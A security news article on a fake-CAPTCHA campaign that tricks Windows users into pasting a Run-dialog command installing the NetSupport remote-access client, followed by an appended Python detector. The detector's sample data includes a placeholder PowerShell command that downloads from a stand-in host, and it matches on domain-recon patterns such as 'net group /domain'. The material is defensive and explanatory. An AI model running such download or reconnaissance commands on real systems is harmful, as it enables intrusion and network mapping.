The Cybereason Global Security Operations Center (GSOC) discovered the campaign in May 2025, revealing how threat actors are weaponizing legitimate remote access tools to gain unauthorized control over victim computers. The attack represents a significant evolution in cybercriminal tactics, combining website compromise with psychological manipulation to bypass modern security defenses. “The attackers are specifically targeting Windows users and have built in mechanisms to avoid detection,” said cybersecurity analysts familiar with the investigation.

The campaign begins with phishing emails, PDF attachments, or malicious links posted on gaming websites that redirect users to compromised WordPress sites. The malicious script first identifies the user’s operating system and browser details, then checks whether they have visited the site before, using local storage tracking to minimize exposure. After the initial infection, victims are presented with a fake CAPTCHA verification page that appears legitimate, complete with modern styling built on React and TailwindCSS. The fake CAPTCHA then instructs users to press Windows + R and paste the “verification code” into the Run dialog box. Believing they’re completing a standard security check, victims unknowingly execute a command that downloads and installs the NetSupport Client software.

“This technique is particularly insidious because it exploits user familiarity with CAPTCHA challenges while bypassing browser security controls,” explained security researchers. “The user themselves perform the final execution step, evading automated detection systems.”

Once installed, the NetSupport Client establishes a persistent connection to command-and-control servers located in Moldova. Within hours of a successful compromise, threat actors have been observed conducting reconnaissance activities, including querying Active Directory for domain computers and transferring files to public directories. The attackers use NetSupport’s legitimate remote command prompt feature to execute commands such as “net group /domain ‘Domain Computers’” to map the network infrastructure.

According to threat intelligence data, NetSupport Manager ranked as the seventh most prevalent threat in 2024, with cybercriminals increasingly favoring legitimate tools to blend malicious activities with normal IT operations. Security experts recommend immediate isolation of affected systems, password resets for compromised accounts, and blocking of identified malicious domains and IP addresses. “The key is recognizing that any instruction requiring users to paste commands into Windows Run dialogs should be treated as highly suspicious,” security researchers emphasized.

Kaaviya is a Security Editor and fellow reporter with Cyber Security News.
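As an added defender-side example (not from the article, Cybereason, or NetSupport), the Python below checks the two signals the article describes: commands pasted into the Run dialog, which Windows records under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and domain-group enumeration such as “net group /domain” spawned under the remote-access client. The RunMRU values, the process events, the placeholder command and the “client32.exe” image name are constructed assumptions for illustration; the recon pattern is generalized to any group name.

```python
import re

# Constructed RunMRU sample: each value stores one Run dialog command with a
# trailing "\1", and MRUList lists the value names most-recent-first.
# The "Invoke-PlaceholderInstall" command is a placeholder, not a real installer.
RUNMRU_SAMPLE = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell.exe -Command "Invoke-PlaceholderInstall http://verify.example.invalid/code"\\1',
}

# Constructed process-creation events with Sysmon Event ID 1 style fields.
# Using "client32.exe" as the NetSupport client image name is an assumption.
PROCESS_SAMPLE = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -Command "Invoke-PlaceholderInstall http://verify.example.invalid/code"'},
    {"parent": "client32.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c net group /domain "Domain Computers"'},
    {"parent": "cmd.exe", "image": "net.exe",
     "cmdline": 'net group /domain "Domain Computers"'},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

RAT_IMAGES = {"client32.exe"}  # assumed remote-access client image names
INTERPRETER = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?\b", re.I)
URL = re.compile(r"https?://", re.I)
DOMAIN_RECON = re.compile(r"\bnet1?(\.exe)?\s+group\s+/domain\b", re.I)  # the recon command from the article

def runmru_entries(values):
    """Run dialog commands, newest first, with the trailing '\\1' marker removed."""
    return [values[n].removesuffix("\\1") for n in values.get("MRUList", "") if n in values]

def suspicious_run_commands(values):
    """Run dialog entries that hand an interpreter a URL: the fake-CAPTCHA paste pattern."""
    return [c for c in runmru_entries(values) if INTERPRETER.search(c) and URL.search(c)]

def triage_processes(events):
    """Tag events worth alerting on; returns (tag, command line) pairs in event order."""
    findings = []
    for e in events:
        cmd = e["cmdline"]
        if DOMAIN_RECON.search(cmd):
            findings.append(("domain-recon", cmd))
        if e["parent"].lower() in RAT_IMAGES:
            findings.append(("rat-spawned-shell", cmd))
        # Win+R launches run under explorer.exe; an interpreter plus a URL there is the lure's payload.
        if e["parent"].lower() == "explorer.exe" and INTERPRETER.search(cmd) and URL.search(cmd):
            findings.append(("run-dialog-download", cmd))
    return findings
```

On a live host the RunMRU dictionary would come from reading the key (for example via `winreg`) for each user profile, and the events from the SIEM or Sysmon log rather than the constructed lists.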
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 11:35:15 +0000